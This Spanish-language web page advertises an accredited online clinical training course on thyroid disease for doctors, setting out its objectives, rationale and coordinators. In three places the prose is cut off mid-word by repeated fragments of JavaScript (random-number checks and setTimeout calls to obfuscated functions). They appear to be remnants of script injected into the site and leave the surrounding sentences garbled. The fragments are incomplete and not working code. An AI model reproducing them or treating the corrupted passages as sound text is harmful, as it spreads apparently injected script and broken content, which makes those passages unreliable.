Programa de formación clínica en tiroides en nuestras manos adaptado a los tiempos modernos, en donde el lector podrá descubrir detrás de cada palabra el esfuerzo y la experiencia de un grupo de endocrinólogos clínicos de diferentes hospitales de nuestro país, en un continuo y fluido intercambio de opiniones y protocolos con la atención primaria y con otros especialistas.

Matrícula ABIERTA DURANTE EL PERIODO ACTIVO ( desde 1 de mayo 2012 hasta 31 de diciembre 2013)

ACREDITACIÓN

att357f5 att35806

Esta actividade formativa organizada, con nº de expediente 11-0025-11/0007-A está acreditada pola Comisión de Formación Continuada das Profesións Sanitarias da Comunidade Autónoma de Galicia, con 9 créditos de formación continuada para LICENCIADO/A EN MEDICINA”

OBJETIVOS

Completar y actualizar la formación clínica recibida en Patología Tiroidea para los Licenciados en Medicina y Cirugía.

Objetivos específicos:

La gran prevalencia de la patología tiroidea enfrenta a todo médico al manejo de la misma, sea desde la atención primaria como desde otras muchas especialidades, debiendo tomar decisiones a diario ante sus pacientes. Los objetivos de este programa de formación clínica en tiroides es la adquisición de los conocimientos prácticos de las herramientas diagnósticas clásicas que permitan la interpretación de pruebas de laboratorio o de imagen como la ecografía, y también a las más modernas, como el PET/TAC. En el campo de la terapéutica debe llegar a saber aplicar y modificar la farmacoterapia habitual en diferentes circunstancias (patologías, embarazo y periodo neonatal, etc), así como la aplicación ordenada de protocolos clínicos. En definitiva integrar un hacer un abordaje clínico de la patología tiroidea en sus aspectos funcional y orgánico al amparo de los protocolos oficiales vigentes en su devenir como médico

PERTINENCIA DE LA ACTIVIDAD

La patología tiroidea es uno de los aspectos clínicos más importantes de la Endocrinología y Nutrición. En la práctica, las demandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andas de consulta constituyen la segunda o tercer causa de pacientes atendidos en las unidades especializadas. El diagnóstico de esta patología ha aumentado exponencialmente desde que se han generalizado pruebas de imagen diagnósticas como la ecografía o TAC cervicales o las determinaciones hormonales de laboratorio como los inmunoensayos. Aunque la patologogía nodular es benigna, un 5% son tumores malignos, lo que es representativo por la gran prevalencia, por tener un pronóstico frecuentemente bueno con un manejo adecuado, y por involucrar en decisiones diagnósticas frecuentemente a médicos no especialistas de endocrinología. La patología funcional es también muy frecuente. Aunque generalmente subclínica, plantea problemas diagnósticos y terapeuticos en patolologías diversas (cardiológicas, digestivas, psiquiátricas, etc), o en momentos de la vida como la menopausia o la gestación, donde es importante un acertado manejo.

En la actualidad estamos asistiendo a un enorme interés formativo por parte de los médicos especialistas de Medicina Familiar y Comunitaria y otros especialistas por el conocimiento y adquisición de habilidades que les permitan un manejo eficaz de las enfermedades tiroideas.

Asistimos a un aumento claro de prevalencia en determinados aspectos de la patología tiroidea:

1. Hipotiroidismo (> 10% de población adulta)

2. Hiperfunción tiroidea.

3. Bocio Nodular

4. Cancer de tiroides, que después del Cáncer de mama es el mayor incremento está experimentandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ando en la actualidad

5. La deficiencia de Iodo poblacional no resuelta y la específica de ciertas situaciones (gestación o menopausia) que obliga a la suplementación específica, incluso de forma preventiva.

6. El bocio multinodular y su incremento con la edad (mucho más marcado en el envejecimiento de la población actual)

– La simplificación y acceso de los métodos diagnósticos actuales con la incorporación de la ecografía a la rutina diaria y la automatización de las pruebas de laboratorio (función tiroidea), hacen posible la realización de diagnósticos y tratamientos por parte de médicos no endocrinólogos.

Por estos motivos, hemos decidido promover un curso formativo amplio, con un enfoque fundamentalmente práctico con contenido on-line aprovechandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ando todos los recursos disponibles en la actualidad. Para ello hemos contado en la elaboración del material con un buen número de especialistas de Endocrinología y Nutrición, involucrados activamente en la asistencia de patología tiroidea y con el deseo de hacer partícipes a otros médicos cada vez más implicados en la prevención, diagnóstico y el tratamiento de las mismas así como establecer los criterios más adecuados de derivación de aquellas, que requieren asistencia especializada.

La inclusión de casos clínicos y de un material complementario de apoyo implica un curso largo, pero atractivo.

Por otra parte la intercomunicación que ofrecerán las tutorías on line y las teleconferencias programadas permitirán una interconexión participativa entre profesores y alumnos.

COORDINADORES CURSOS

  • – Dr. Diego Bellido Guerrero, profesor asociado de Nutrición y Dietética de la Universidad de A Coruña. Especialista de Endocrinología y Nutrición del Hospital Arquitecto Marcide de El Ferrol (La Coruña).
  • – Dr. Martín López de la Torre Casares, Facultativo Especialista de Endocrinología y Nutrición del Hospital Universitario Virgen de las Nieves de Granada.
  • – Dr. Alfonso Soto Gonzalez , Facultativo Especialista de Endocrinología y Nutrición. Hospital Universitario de La Coruña.